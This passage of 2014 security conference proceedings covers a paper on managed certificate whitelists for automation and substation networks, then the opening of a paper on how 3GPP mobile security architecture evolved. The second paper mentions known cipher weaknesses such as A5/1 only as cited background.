A certificate infrastructure is required that is suitable for an
operational automation environment. Main considerations are
the demand for extremely high system availability, requiring
that the automation system can continue to operate in an
autonomous island mode, and the fact that many automation
systems are set-up as separate network segments that have no
or only limited connectivity with general office networks or
even the public Internet. Moreover, the fact that these systems
are typically engineered, e.g., that the communication relations
are known up front, can be leveraged for certificate and access
management.
A self-contained certificate management tool (command line
tool, or with GUI) can be well suited for a small number of
devices, but it does not scale well to scenarios with a larger
number of devices. A full-blown PKI infrastructure could be
efficient for an extremely huge number of devices, but these
go beyond the scale of a common single automation systems.
The problem can be summarized that a solution is needed
that can be set-up and operated autonomously within a certain automation environment without relying on a globally
accepted certification authority, and that scales well for “midsize” automation environments, for which a self-contained
certificate tool is too small, and a full PKI solution would
be too complex and costly. It may be also advantageous to
avoid the need for deploying a separate identity and access
management infrastructure.
The remainder of this paper if structured as follows: After summarizing background work in Section II, Section III
describes certificate whitelists as a new paradigm for using
digital certificates. The management of certificate whitelists is
described generically in Section IV, and a specific adaption
into energy automation systems is outlined in Section V. An
outlook to possible future extensions is given in Section VI.
II. BACKGROUND AND P REVIOUS W ORK
Secure communication protocols, digital certificates, and
public key infrastructure PKI [9], [10] have been dealt with
intensively for years. An introduction is given in common
text books on IT security [11]. The remainder of this section
summarizes shortly major aspects that are relevant to managed
certificate whitelists.
167
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Public Key Certificate
Private
Public
Subject Entity associated with certificate
Validity Period of validity
Serial Number 31748
Subject Public Key
Issuer
Signature
Name of certificate issuer
digital signature
Subject has a corresponding
private key
Fig. 1. Digital Certificate (X.509)
A. Device Communication Security Technologies
Digital device certificates are the basis for device communication security as used in industrial automation systems, and
in the future Internet of Things (IoT). Major communication
security protocols are available for the different layers of
the communication protocol stack that support digital device
certificates for authentication:
• Link layer: The standard 802.1X [3] provides Network
Access Control to restrict access to a network only for
authenticated devices. It is also possible to encrypt the
communication link using the MACsec of 802.1X.
• Network layer: The communication can be protected with
IPsec [5] on the network layer. The required security
associations can be established by the IKE [4] protocol.
• Transport layer: With TLS [8], the successor of the SSL
protocol [7], communication can be protected on the
transport layer.
• Application layer: SSH or WS-Sec are available to protect application layer protocols as HTTP, SOA (REST,
SOAP), CoAP, XMPP, or MQTT.
B. Digital Certificates
The main purpose of a digital certificate is to reliably assign
information about the subject, i. e., the owner, of a public key.
The owner may be identified by its name or email address
in case of a person, or by its network name (DNS name)
or IP address of a server. Additional information encodes
usage information about the public key respectively the digital
certificate, as validity period, and allowed key usages as user
authentication or email encryption. For device certificates, it is
possible to encode the device manufacturer, the device model,
and the serial number within a device certificate.
The most commonly used certificate format is ISO
X.509 [9]. Figure 1 shows the format and some examplary
fields. The main purpose of a digital certificate is to bind a
public key (Subject Public Key Info) of an entity to
the name of the entity (Subject). Additional information as
the validity period, the issuer, and usage restrictions can be
included as well.
When a digital certificate of a subject is validated by a
communication peer, it is verified that the certificate has a
valid digital signature of a trusted certification authority. It is
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
furthermore verified that the entries of the certificate match the
intended usage. It may also be verified whether the certificate
has been revoked. A revocation check may verify whether
a given certificate is included in a certificate revocation list
(CRL), or an online revocation status check may be performed
using the open certificate status protocol (OCSP) [12]. In either
case, at least partial online access to a PKI entity that is issuing
certificates and providing revocation information is needed at
least from one component in an automation network or cell.
This component may further distribute the information within
the automation cell.
C. Certificate Root Key
A digital certificate has to be validated before it is accepted.
This includes a check whether the digital signature protecting
the certificate is trusted. The standard approach is to use a set
of trusted root certificates for certification authorities CA. A
certificate is accepted if its signature chain can be verified back
to a trusted root certificate. The root certificate may belong to
a globally recognized CA, or to a local CA that is accepted
only within an administrative domain, e. g., within a single
operator network. If no PKI with CA is available, it is also
possible to use self-signed certificates. This means that each
certificate is signed with the private key associated with the
public key contained in the certificate. Such certificates have
to be configured as trusted in the same way as trusted root
certificates, i. e., the (self-signed) certificates of trusted peers
have to be configured explicitly. This requires to store the
trusted peer information (root CA, or self signed certificates)
in a secure manner, as this information is crucial for system
security.
D. Certificate Whitelisting
The basic concept of certificate whitelists is well-known.
The underlying idea is to enumerate explicitly all authorized
certificates. A certificate is validated successfully only if it is
contained in the certificate whitelist. The whitelist may contain
the certificates directly, or reference the certificates by their
serial number and issuer, by the certificate fingerprint, or by
the public key. The latter avoids issuing a new whitelist, when
a certificate is updated.
Such a certificate whitelist can be considered and used
also as an access control list that contains the certificates
of all authorized subjects. Without using specific certificate
extensions, the different operations cannot be distinguished,
however. The configuration of the set of trusted root certificates
is also a form of certificate whitelists. It is known to check
whether the certificate of a communication peer is included
in a certificate whitelist [13]. Also, the Microsoft Digital
Rights Management License Protocol is using a certificate
whitelists [14].
As these certificate whitelists have been used as a proprietary means for configuring a list of trusted certificates, or to
be more precise a set of trusted certificates, the approach has
been rather limited as general means for certificate management.
168
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
III. C ERTIFICATE M ANAGEMENT AND VALIDATION U SING
C ERTIFICATE W HITELISTS
The set-up and operation of a public key infrastructure
has shown to require significant effort and costs. This has
been a limiting factor for the practical usage of public key
cryptography. Ongoing standardization activities define the
technological basis for simpler usage of public key cryptography for industrial automation environments and the future
Internet of Things.
While a certificate whitelist has been used so far as proprietary means for configuring some digital certificates as
trusted, a certificate whitelists format is currently standardized for the smart energy grid environment. It has been
acknowledged that the application of certificate whitelists in
restricted environments supports the long term administration
of security parameters. Hence, standardizing the format is the
next consequent step to ensure interoperability of different
vendor products.
A certificate whitelist is a data structure containing respectively referencing a set of trusted digital certificates. A
certificate can be referenced by its serial number and issuer,
or by a fingerprint of the certificate (hash value). The certificate
whitelist is signed using a whitelist root key of trust (WROT).
A certificate is validated successfully if it is contained
in a corresponding certificate whitelist. Further checks on
the contents of the certificate as the name of the subject,
the certificate extensions, and the certificate signature are
performed in the usual way.
Certificate whitelists can be used with certificates issued by
a CA, or with self-signed certificates. A common technological
basis is provided for smaller environments using self-signed
certificates as well as environments using a PKI for issuing
certificates. So, a smooth migration from self-signed certificates to a local PKI and even towards global PKI is provided.
A certificate can be revoked easily by not including it
anymore in the certificate whitelists. However, it is also
possible to check the certification revocation status using
certificate revocation lists [9] or using the online certificate
status protocol OCSP [12].
1) Standardization Activities: Currently ongoing standardization activities performed by ISO/IEC 62351 [15] in alignment with ITU-T X.509 [9] define the usage of certificate
whitelists for energy automation systems. Currently, a format
is defined for a certificate whitelist. Figure 2 shows a recent
proposal for a certificate whitelist. It is based on the format
of a certificate revocation list CRL, but its assigned type
(CertificateWhiteList) distinguishes it from a CRL.
Also, the intended scope of a certificate whitelist is defined by
a specific attribute scope. It allows a client to verify whether
a certain certificate whitelist has in fact been intended for a
specific purpose. For example, the IP addresses or DNS names
of devices for which the whitelist is intended to be used can
be included.
The target scope of a certificate whitelist can be explicitly
encoded in a certificate whitelist. Therefore, a certificate
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
CertificateWhiteList ::= SEQUENCE {
tbsCertWhiteList
TBSCertWhiteList,
signatureAlgorithm
AlgorithmIdentifier,
signatureValue
BIT STRING
}
TBSCertWhiteList ::= SEQUENCE {
version
Version OPTIONAL,
-- if present must be v1
signature
AlgorithmIdentifier,
issuer
Name,
thisUpdate
Time,
nextUpdate
Time OPTIONAL,
scopedList
SEQUENCE OF SEQUENCE {
scope
ScopeConstraints,
-- geographic,organizational
authorizedCertificates
SEQUENCE OF SEQUENCE {
fingerprint
AlgorithmIdentifier, -- for FP creation
certIdentifier::== CHOICE {
serialCert
[0] CertificateSerialNumber,
fingerprintCert [1] OCTET STRING -- FP of certificate
fingerprintPK
[2] OCTET STRING -- FP of public key
}
certificateIssuer
Name OPTIONAL,
cwlEntryRestriction
[0] EXPLICIT Extension OPTIONAL
-- further restrictions of cert. usage
}
}
cwlExtensions [0] EXPLICIT Extensions OPTIONAL
{- for future use
}
Fig. 2. Certificate Whitelist Format [15]
START
Verify Certificate
no
Success
Error Message
yes
present
White list
extension
Fetch white list if necessary.
Verify signature on white list
Not present
Apply certificate in application
Verification
successful?
no
Error Message
yes
certificate on
whitelist ?
no
Error Message
yes
Apply certificate in application
Fig. 3. Validation of a Certificate with Certificate
whitelist cannot be used unintentionally for a different purpose
as the intended purpose at time of compilation. Certificate
whitelists can be compiled once during as part of engineering.
Alternatively, end devices can pull a certificate whitelist from a
whitelist certificate server in defined time intervals. The CWL
can also be pushed to the field devices.
A digital certificate may be intended to be used only
within a certificate whitelisting environment. To ensure that
a certificate is in fact validated successfully only together
with a corresponding whitelist, it is possible to include a
corresponding extension in the certificate. The extension marks
it explicitly to be accepted only if it is included in a certificate
whitelist. A corresponding certificate extension is currently
defined by ISO/IEC 62351 [15].
The validation of a certificate depends on whether it contains a certificate whitelist extension. Figure 3 shows the relevant checks. If a certificate includes the whitelisting extension,
it is required that the corresponding whitelist is available and
that the certificate is in fact included in the whitelist.
169
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
IV. M ANAGED C ERTIFICATE W HITELISTS
The introduction of certificate whitelisting implies the need
for a management system for certificate whitelists. Managed
certificate whitelists are a new approach for using public key
cryptography in a practical, efficient and effective way. It is
particularly suited for systems with well-known set of devices and their communication relationships, as it is common
for networked automation systems. As the management of
whitelists can be fully automated, it scales well to larger number of devices, although due to the increasing size of whitelists
the targeted application environment is characterized by a
number of devices within a range up to some 100 to some 1000
devices. It integrates well within existing industrial workflows
for installing or exchanging devices, as device configuration
databases are kept up-to-date within automation systems. So,
the information that is required to generate updated certificate whitelists is already available. Once certificate whitelists
have been generated and installed on the target devices, the
target devices can operate autonomously even if the security
infrastructure is not available. This is an important property for
automation environments with high availability requirements
to ensure that the automation system can continue to operate
even if backend systems are temporarily unavailable.
A. Whitelist Generation and Distribution
The basic concept for automatic whitelist management is
rather straightforward. Using information which is available
in common automation systems about the devices and their
communication relationships within a networked automation
system, several purpose-specific – and also device-specific if
needed – certificate whitelists are generated automatically. The
whitelists are distributed to the target devices using remote
configuration protocols. For example, secure copy scp [6],
HTTPS [16], or OPC-UA [17] can be used to distribute
configuration files securely to the target devices.
Figure 4 shows the main components involved in the automatic management of certificate whitelists. A central device
management component accesses a device database including
all registered devices of a networked automation system and
their associated device certificates. Using automation system configuration data, the communication relationships are
determined. Based on this information, certificate whitelists
can be compiled for the different communication purposes
as automation control communication, supervisory control
communication, remote service access and diagnostic access.
Depending on policy, device-specific certificate whitelists can
be compiled, or certificate whitelists for defined purposes and
target device classes. The certificate whitelists are created
and provided to a device management system that configures
the relevant certificate whitelists on the target devices. As
important difference to a certification revocation list CRL, a
certificate whitelist will usually be provided and be signed
by the operator, not by the certification authority (CA). This
has the advantage that an automation system operator can use
managed certificate whitelists easily with certificates issued by
different CAs, and even with self-signed certificates.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Configuration Database
- device inventory
- plant configuration data
Certificate Database
- CA keys
- device certificates
Certificate
Whitelist
Compiler
Whitelist
Signing Key
Certificate
Whitelist
Distribution
Point
Automation
Network
FD
FD
FD
Field Devices
Fig. 4. Certificate Whitelist Management System
For networked automation systems with a typical size of
some 100 to some 1000 devices, such a certificate management
system based on whitelisting provides several advantages for
the application in real-world industrial usage scenarios: A
local PKI or even self-signed certificates can be used, so
that a deployment with a very limited security infrastructure
is possible. For the operation of the automation system,
no continous reachability or availability of the whitelisting
security infrastructure is required. So, the availability of the
automation system availability does not depend on the availability of the security infrastructure. A commonly availably
device management infrastructure can be extended easily for
automatically creating and distributing certificate whitelists.
It is possible to use a certificate whitelist only for authentication. Authorization checks would then be performed in
addition, e. g., by checking an access control list. However, a
certificate whitelist can be used directly as access control list
as well. Different certificate whitelists would be configured
for the different types of access (e. g., control communication,
service access, diagnosis). The current proposal for a CWL
structure considers this by supporting the encoding of a list
of lists. Moreover, within the CWL, further certificate usage
restrictions may be encoded. One example is the definition of
dedicated applications or communication protocols which are
allowed to utilize a dedicated certificate. Using this approach,
the communication peer could refuse to accept a certificate
included on the CWL if it is not associated within the CWL
with the currently used communication protocol.
This has the advantage that no separate identity and access
management infrastructure is needed, and that access control
decisions can be performed by a field device when the backend
systems are not available. These properties make certificate
whitelisting a very interesting approach for managing digital
certificates in typical industrial automation systems.
B. Example Usage Scenarios
Typical workflows in industrial automation systems are the
initial installation, the replacement, and removal of devices. As
170
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
device configuration databases are already maintained as part
of these workflows, the information for updating certificate
whitelists is available without any extra effort required from
the service personnel. As changes in the configuration are
detected by the certificate whitelisting system, the generation
of updated certificate whitelists is started and the deployment
to affected target devices is triggered.
V. A PPLICATION W ITHIN E NERGY AUTOMATION
S YSTEMS
The general approach of using managed certificate whitelists
as described in the previous section can be applied for energy
automation systems (smart grid). Figure 5 shows a substation
automation system. A substation typically transforms voltage
levels, and includes power monitoring and protection functions. Figure 5 shows separate network zones of the substation
communication network. The field devices that perform the
actual field level functionality of monitoring and acting on
the electric power are called intelligent energy devices (IED).
They are monitored and controlled by a substation controller,
realizing a realtime automation system. Energy automation
protocols are defined by the standard IEC61850 [18] which defined the Generic Object Oriented Substation Events (GOOSE)
protocol. Additional network zones are available for local and
remote service access, for integrating intelligent field devices
with serial interfaces, and for support functions (file server,
historian server for logging, remote access server, terminal
server). A substation is connected to the utility communication
network providing backend services like supervisory control
and data acquisition (SCADA). Firewalls are used to control
the traffic flow between zones.
A hierarchical creation and distribution of certificate
whitelists to a substation may be realized in the following
way: A utility operator creates a substation-specific certificate
whitelist (substation cert whitelist) based on the engineering
information for this substation and distributes it to the substation controller. The specific substation is encoded in the CWL
by the scope restriction. Using engineering information that is
available at the substation controller, the substation controller
creates device-specific certificate whitelists for the field devices, i. e., intelligent energy devices (IED), of the substation.
The device-specific certificate whitelists are configured by the
substation controller on the differend IEDs.
An alternative approach would be to compile a CWL for a
substation, and to distribute this CWL to all components in
the substation via the substation controller. Through the engineering information, each IED will only communicate with
other IEDs by means of the engineering data and the CWL.
This means that the access control decision is made by an IED
by checking both the CWL and the engineering information.
This saves the additional effort for creating device specific
CWLs, but has the disadvantage that each IED needs to search
a larger CWL, and has to check two pieces of configuration
information separately. It is a validation perfomance decision
which approach is more appropriate in a target environment.
The generic definition of CWLs allows for both approaches.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
A further usage scenario for certificate whitelisting within
energy automation systems would be integration of decentralized energy resources. Here, a smart grid operator could realize
a (managed) certificate pinning by using certificate whitelists.
A smart grid operator would define which certificates are acceptable by including these certificates in a whitelist. Thereby,
the smart grid operator would use certificate whitelists to
restrict the set of certificates issued by a larger PKI. The
possibility to misuse broken certificates or CAs is reduced
as the set of accepted certificates is limited.
Fig. 5. Managed Certificate Whitelisting in Energy Automation Substations
VI. C ONCLUSION AND O UTLOOK
Explicitly designating trusted certificates in certificate
whitelists has been recently put forward within standardization for industrial energy automation communication [15].
It promises to provide a cost-efficient, easily deployable,
and operable approach for digital device certificates even if
self-signed certificates are used. It is intended for mid-sized
industrial automation domains, while providing a migration
path to more flexible PKI and access management structures. It
allows in particular to avoid the usage of simple manually configured pre-shared secrets, that would be difficult to migrate
to more complex and managed security infrastructures that are
expected to be advantageous for large scale deployments.
The usage of certificate whitelisting can be supported with
automatic whitelist generation and distribution. A format for
certificate whitelists is currently being standardized to provide an interoperable format. Specific extensions can mark a
certificate explicitly for being used only in combination with
a certificate whitelist. Several additional extensions may be
introduced. It may be possible to indicate usage restrictions
within a certificate whitelist associated with a certain certificate entry. This could be used to limit the authorized usage
of a certificate on a certificate-by-certificate basis. Certificate
171
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
whitelists may be encoded efficiently by including matching
criteria of included certificates. Alternatively to the explicit
enumeration of certificates, a filter can be included in a
certificate whitelist that defines matching criteria of included
certificates, i. e., that defines required properties of certificate
fields. A Bloom filter [19] may be used, combined with a
check on false match. Bloom filters are a probabilistic data
structure for membership queries which allow for an efficient
encoding, but for which a wrong positive match may occur.
As the set of all issued certificates is known in typical usage
scerarios, a checking for a false match is easily possible. Also,
certificates can be designated within a whitelist. Also, a PKI
gateway can be deployed for secure interworking with external
network domains using a standard public key infrastructures.
Also, the logical combination of multiple certificate
whitelists is possible in general. A combination of certificate
whitelists may be advantageous for instance in an intersubstation communication scenario. Here, a first certificate
whitelist may be provided for the substation internal communication, and a second one for inter-substation communication. The final certificate whitelist for each purpose may
be defined by a logical combination of whitelists to ease the
certificate whitelist administration and the handling for the
field device. This might be done by logical OR, AND, or XOR
combinations of the certificate whitelists. This logical combination can be realized in different ways: The field devices
themselves can check against multiple certificate whitelists.
A logical expression is configured that defines the logical
combination of the certificate whitelists to be applied. As the
defined certificate whitelist structure shown in Fig. 2 allows
the encapsulation of multiple certificate whitelists within a
single data structure, an enhancement of this data structure
could indicate the logical combination of the whitelist entries
using the extension option. A further alternative would be
the preparation of device specific certificate whitelists by a
centralized infrastructure component that determines the result
of the logical combination of different certificate whitelists
before distributing the actual certificate whitelist to the end
points. This puts more effort on the centralized component,
but keeps the effort low for the field device. The assumption
here is that the certificate whitelist for a single endpoint is
rather short compared to substation wide certificate whitelists
containing all allowed (engineered) combinations of communication associations. The structure defined in Fig.2 also allows
to use different matching criteria for the certificate. While the
serial number and issuer or the fingerprint are straight forward,
the utilizatin of the public key fingerprint provides another
degree of freedom. This approach allows even for updating
certificates (assumed the public key stays the same) without
changing the CWL. This decouples the certificate life cycle
management from the access security policy management of
certificates in automation environments.
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
R EFERENCES
Local and Metropolitan Area Networks–Specific Requirements
Part 11: Wireless LAN Medium Access Control (MAC)
and Physical Layer (PHY) Specifications.” [Online]. Available:
http://standards.ieee.org/about/get/802/802.11.html [accessed: 2014-0901]
R. Fielding, J. Gettys, J. Mogul, H. Frystyk, L. Masinter, P. Leach,
and T. Barners-Lee, “Hypertext Transfer Protocol – HTTP/1.1,”
1999, Internet Request for Comments RFC2696. [Online]. Available:
https://tools.ietf.org/html/rfc2696 [accessed: 2014-09-01]
IEEE 802.1X-2010, “IEEE Standard for Local and metropolitan area
networks–Port-Based Network Access Control,” . [Online]. Available:
http://standards.ieee.org/findstds/standard/802.1X-2010.html [accessed:
2014-09-01]
C. Kaufmann, P. Hoffman, Y. Nir, and P. Eronen, “Internet
Key Exchange Protocol Version 2 (IKEv2),” Sep. 2010,
Internet Request for Comments RFC5996. [Online]. Available:
https://tools.ietf.org/html/rfc5996 [accessed: 2014-09-01
S. Kent, and K. Seo, “Security Architecture for the Internet Protocol,”
Dec. 2005, Internet Request for Comments RFC4301. [Online].
Available: https://tools.ietf.org/html/rfc4301 [accessed: 2014-09-01]
T. Ylonen, and C. Lonvick, “The Secure Shell (SSH) Protocol
Architecture,” Jan. 2006, Internet Request for Comments RFC4251.
[Online]. Available: https://tools.ietf.org/html/rfc4251 [accessed: 201409-01]
Netscape,
“SSL
3.0
specification,”
Nov.
1996.
[Online].
Available:
http://web.archive.org/web/20080208141212/
http://wp.netscape.com/eng/ssl3/ [accessed: 2014-09-01]
T. Dierks, and E. Rescorla, “The Transport Layer Security (TLS)
Protocol Version 1.2,” Aug. 2008, Internet Request for Comments
RFC5246. [Online]. Available: https://tools.ietf.org/html/rfc5246
[accessed: 2014-09-01]
ITU-T X.509, “X.509 Information technology – Open Systems
Interconnection -– The Directory: Public-key and attribute certificate
frameworks,” 2012, version 3 corrigendum 3. [Online]. Available:
http://www.itu.int/rec/T-REC-X.509-201210-S!Cor3/en [accessed: 201409-01]
D. Cooper, S. Santesson, S. Farrel, S. Boeyen, R. Housley, and
W. Polk, “Internet X.509 Public Key Infrastructure Certificate
and Certificate Revocation List (CRL) Profile,” May 2008,
Internet Request for Comments RFC5280. [Online]. Available:
https://tools.ietf.org/html/rfc5280 [accessed: 2014-09-01
J. Buchmann, E. Karatsiolis, and A. Wiesmaier, “Introduction to Public
Key Infrastructures,” 2013.
S. Santesson, M. Myers, R. Ankney, A. Malpani, S. Galperin, and C.
Adams, “X.509 Internet Public Key Infrastructure Online Certificate
Status Protocol - OCSP,” Jan. 2013, Internet Request for Comments
RFC6960. [Online]. Available: https://tools.ietf.org/html/rfc6960
[accessed: 2014-09-01]
eTutorials.org, “C/C++ Secure Programming – Chapter 10.9 Using a
Whitelist to Verify Certificates,” 2014, eTutorials.org. [Online]. Available: http://etutorials.org/Programming/secure+programming/ [accessed:
2014-09-01]
Microsoft, “Digital Rights Management License Protocol – Retrieving
Revocation Data from the Enrollment Server,” 2014. [Online]. Available: http://msdn.microsoft.com/en-us/library/dd644914.aspx [accessed:
2014-09-01]
ISO/IEC 62351, “Power systems management and associated
information exchange Data and communication security,” 2014, IEC
TC57. [Online]. Available: http://tc57.iec.ch/index-tc57.html [accessed:
2014-09-01]
E. Rescorla, “HTTP Over TLS,” 2000, Internet Request for Comments
RFC2818. [Online]. Available: https://tools.ietf.org/html/rfc2818
[accessed: 2014-09-01]
OPC Foundation, “OPC Unified Architecture Specification Part 1:
Overview and Concepts, Release 1.02,” Jul. 2012. [Online]. Available:
http://www.opcfoundation.org/ua/ [accessed: 2014-09-01]
ISO/IEC 61850, “IED Communications and Associated Data
Models in Power Systems,” 2014, IEC TC57. [Online]. Available:
http://tc57.iec.ch/index-tc57.html [accessed: 2014-09-01]
Wikipedia,
“Bloom
Filter.”
[Online].
Available:
http://en.wikipedia.org/wiki/Bloom filter [accessed: 2014-09-01]
[1] IEEE 802.11, “IEEE Standard for Information Technology–
Telecommunications and Information Exchange Between Systems,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
172
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Challenges for Evolving Large-Scale Security Architectures
Geir M. Køien
Institute of ICT
Faculty of Engineering and Science
University of Agder, Norway
Email: geir.koien@uia.no
Abstract—In this paper, we conduct an informal analysis of
challenges that face evolving large-scale security architectures.
The 3rd generation partner project (3GPP) mobile systems is
our example case and we shall investigate how these systems
have evolved and how the security architecture has evolved with
the system(s). The 3GPP systems not only represent a truly
long-lived system family, but are also a massively successful
system family, serving billions of subscribers. What once was
an auxiliary voice-based infrastructure has evolved to become
a main (and thereby critical) information and communications
technology (ICT) infrastructure for billions of people. The 25+
years of system evolution has not all been a linearly planned
progression and the overall system is now clearly also a product
of its history. Our ultimate goal is to capture some of the essence
of security architecture evolution for critical ICT system.
Keywords–Evolving Security; System Security; Security Architecture; Long-term security planning.
I.
I NTRODUCTION
In this paper, we carry out a case-study analysis of some of
the challenges that evolving large-scale security architectures
must meet. The object of our study, the 3GPP systems, has
gradually become important, all-encompassing and pervasive
on a global scale. The systems have emerged to become a
critical ICT infrastructure and this makes the system robustness
and security a concern for society-at-large.
A. The 3GPP System Context
The first 3GPP system is the second generation (2G)
Global System for Mobile communications (GSM), developed
in the mid/late 1980ies. Originally, GSM only featured circuitswitched (CS) services, but was later adapted to also include
packet-switched (PS) services through the General Packet
Radio Service (GPRS) extension. With the new millennium
came the third generation (3G) Universal Mobile Telecommunications System (UMTS), which natively features both CS
and PS services. From around 2010 we also have the fourth
generation (4G) Long-Term Evolution (LTE) system, which is
a broadband PS-only system. LTE is further developed into
LTE-Advanced (LTE-A).
1) Principal Parties: From a subscriber perspective, the
system can be described with three types of principal parties.
•
The Home Public Land Mobile Network (HPLMN)
•
The Visited Public Land Mobile Network (VPLMN)
•
The subscriber/user (USER)
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
These parties are legal entities, and the relationships are
determined by contractual agreements. A national telecom
regulator will also be involved, in addition to external service
providers. One may also add intruders to the list. The external
service providers usually have little influence on how the networks operate and so we exclude those for further discussion.
Likewise, in this context, we do not see a need for including
virtual mobile network operators (VMNOs).
2) System Development: The 3GPP system specifications
are developed by the 3GPP, but ratification is done by the
organizational partners (formal standardization bodies). As
with other such groups, the 3GPP is contribution driven. This
has an important impact on what is actually being done.
The impact is noticeable when it comes to priorities and
efforts spent. Early on, when GSM/GPRS was specified, the
operators took considerable responsibility and led many of the
efforts. Subsequently, the vendors have taken over more and
more of this work. The impetus to carry out work is clearly
related to the business potential the work has. Unfortunately,
investments in security functions seldom look like a good
business proposition prior to an incident.
The 3GPP differentiates between mandatory for implementation and mandatory for use. That is, a feature may be
mandatory to be implemented by the vendors if they want
compliance with a system release. At the same time, the
operators may freely disregard the feature if they want. Other
functions may be mandatory both to develop and deploy.
3) License to Operation and Regulatory Requirements:
Cellular systems operate in licensed bands and are subject to
regulatory requirements. These requirements include support
for lawful interception (LI) and emergency call (EC). The last
decade we have also had anti-terrorist measures such the EU
Data Retention Directive (DRD) [1].
B. Brief Introduction to 3GPP Systems
1) 2G – GSM and GPRS: The GSM and GPRS systems
are the 2G systems. It is common to see monikers like 2.5G
used for GPRS, and 2.9G used for GPRS with Enhanced
Data rates for Global Evolution (EDGE). The main GSM
features are mobility, speech and text messaging. GPRS is
an overlay system to GSM. It features two additional core
network nodes and provides PS support. With EDGE (new
codecs) it provides up to 236 kbps data-rate. There is also an
“Evolved EDGE” extension on the horizon, with yet higher
data-rates. The 2G-based radio access network is called GSM
EDGE Radio Access Network (GERAN).
173
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
2) 3G – UMTS (incl. High-Speed Packet Access (HSPA)):
The UMTS system was finalized in late 1999 and is a combined CS/PS system. It can readily achieve >10 Mbps datarates (w/max. rates >100 Mbps downlink). The system is a mix
of GSM/GPRS technology and protocols and, increasingly,
IP-based protocols and technology. The radio access network
is called the Universal Terrestrial Radio Access Network
(UTRAN).
3) 4G – LTE and LTE-A: The LTE systems are designed
as all-IP networks (AIPN) and features true mobile broadband.
The core network is fully IP based and there are no CS
components to be found. The radio system is highly advanced
and provides true broadband services. The radio base-stations,
called eNB, are logically mesh connected. There are no
longer any controllers in the access network (E-UTRAN). The
VPLMN mobility functions are carried out by the mobility
management entity (MME) server.
C. Paper Layout
In Section II, we briefly outline the security of the 3GPP
systems. In Section III, we attempt to capture some of the triggers for changing the security architecture. Then we proceed
in Section IV, with observations regarding successful systems,
and for security and cryptography in those systems. We also
include observations regarding the typical intruders. In Section
V, we try to learn from the lessons and provide some advice.
Finally, we sum up our effort and provide some concluding
remarks in Section VI.
crypto). The SIM also contains the security credentials, like the
permanent subscriber identity (IMSI) and the corresponding
128-bit authentication secret, called KI in the 2G SIM. Figure
1 outlines the GSM security procedures.
The AKA protocol used is called GSM AKA, and it is a
single-pass challenge-response protocol with a signed response
(SRES). The challenge is a pseudo-random 128-bit RAND
bit-field and the response is the 32-bit SRES element. The
challenge-response part is dependent on an “authentication set”
forwarding stage, in which the HPLMN forwards the authentication credentials to the VPLMN network. The protocol is
run between the SIM and the visited network. This scheme
is efficient and allows for fast and simple authentication of
the subscriber as well as deriving a session key (the 64bit KC ). The SIM features the A3 and A8 AKA interfaces,
which are only found in the SIM and the home subscriber
database (HLR). The original example implementation, called
COMP128, is cryptographically broken [3], but still seems to
be in use in many markets.
U s e r E q u ip m e n t
H o m e E n v ir o n m e n t (H E )
S e r v in g N e tw o r k (S N )
A c c e s s N e tw o rk (A N )
C o re N e tw o rk (C N )
F u tu r e N e tw o r k
V L R /
M S C
T e le n o r
T e len o r R & D
B S C
D u h a r f o r lite å g jø r e !
S IM
H L R /
A u C
B T S
M S
P r o v i d e
I d e n t i t y
( I M S I )
S E N D _ A U T H _ I N F O ( I M S I )
S E N D _ A U T H _ I N F O - a c k ( A u t h S e t )
A U T H E N T I C A T I O N _ R E Q U E S T ( R A N D )
A U T H E N T I C A T I O N _ R E S P O N S E ( S R E S )
C I P H E R _ M O D E _ C O M M A N D
II.
S ECURITY IN THE 3GPP S YSTEMS
In this Section, we provide a (necessarily) short description
of the main features of the 3GPP security provisions.
C I P H E R _ M O D E _ C O M P L E T E
S c o p e o f G S M
c o n fid e n tia lity
p r o te c tio n
Figure 1: GSM security overview
A. 2G Security
There is no well-defined security architecture per se in
the 2G systems. The main security specification was technical
specification (TS) 03.20 “Security-related network functions”,
which subsequently has been transposed into TS 43.020 [2].
It defines the identity- and location privacy scheme, the entity authentication protocol and the smart-card based security
functions. It also outlines the over-the-air cipher function.
1) Background and Requirements: In the voice-only 1G
systems one had experienced charging fraud and impersonation
fraud. Two distinct types of attacks quickly came into focus:
a) Eavesdropping was a big problem as the analogue voice
channel was unprotected and easy to listen-in on. b) Faking
the call setup signaling, which was digital, was quite easy
and could in principle be done by simply recording a setup
sequence and then later replay it. The main priority for a fully
digital system a la GSM was therefore to a) protect the overthe-air channel against eavesdropping, such that it would no
longer be the weakest link, and b) provide credible subscriber
authentication to avoid impersonation attacks.
2) The 2G Security Architecture: GSM security is based
on a physical subscriber identity module (SIM). For portability
reasons it was decided to use a smart-card. The SIM comprises
both hardware and software functionality, and it contains the
authentication and key agreement (AKA) functions (symmetric
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Over-the-air encryption is by means of the A5 stream
cipher family, which is located in the mobile phone and
the base tranceiver station (BTS). There are several A5
versions available, but the original A5/1 is still the default
and mandatory-to-deploy algorithm. It can easily be broken
today by a dedicated attacker [4]. The A5/2 algorithm, which
was explicitly designed to be weak (CoCom regulations), is
officially deprecated. The A5/3 algorithm, which is based on
the 3G KASUMI design, is the current best option for GSM,
but rainbow table attacks still work since the algorithm is
limited to 64-bit [5]. The A5 family is based around a 64bit key, expect the new (and not deployed) A5/4 cipher, which
is a 128-bit design based on the KASUMI algorithm. In GPRS
one uses the GSM AKA protocol as-is, but here one uses
the GPRS Encryption Algorithm (GEA) ciphers to protect the
asynchronous packet transfers.
3) Omissions and Shortcomings: There are many obvious
